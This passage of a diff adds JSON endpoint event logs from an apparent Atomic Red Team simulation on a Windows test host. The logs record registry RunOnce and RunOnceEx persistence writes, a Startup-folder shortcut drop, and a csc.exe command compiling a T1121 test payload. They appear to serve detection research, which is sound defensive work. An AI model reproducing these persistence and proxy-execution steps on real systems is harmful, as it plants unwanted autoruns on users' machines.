"pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "registry", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend\\1", + "registry_value": "1", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "process", + "pid": 1484, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" + }, + { + "event_type": "process", + "pid": 3792, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1688, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570854620000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1688, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1688, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1688, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854490000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1688, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854650000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1688, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570854650000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" + }, + { + "event_type": "process", + "pid": 1688, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570854650000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NextRun", + "registry_value": "NextRun", + "timestamp": 131883570855110000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NextRun", + "registry_value": "NextRun", + "timestamp": 131883570855270000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "file", + "file_name": "Notepad.lnk", + "file_path": "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Notepad.lnk", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "timestamp": 131883570856830000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library C:\\AtomicRedTeam\\atomics\\T1121\\src\\T1121.cs\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4760, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570858150000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570858080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570858080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570858080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570858080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570858080000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00108A214D01}" + }, + { + "command_line": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library C:\\AtomicRedTeam\\atomics\\T1121\\src\\T1121.cs", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3592, + "ppid": 4760, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "subtype": "create", + "timestamp": 131883570858230000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}", + "unique_ppid": "{42FC7E13-CADD-5C05-0000-00108A214D01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858400000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570858400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "csc.exe", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858400000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": 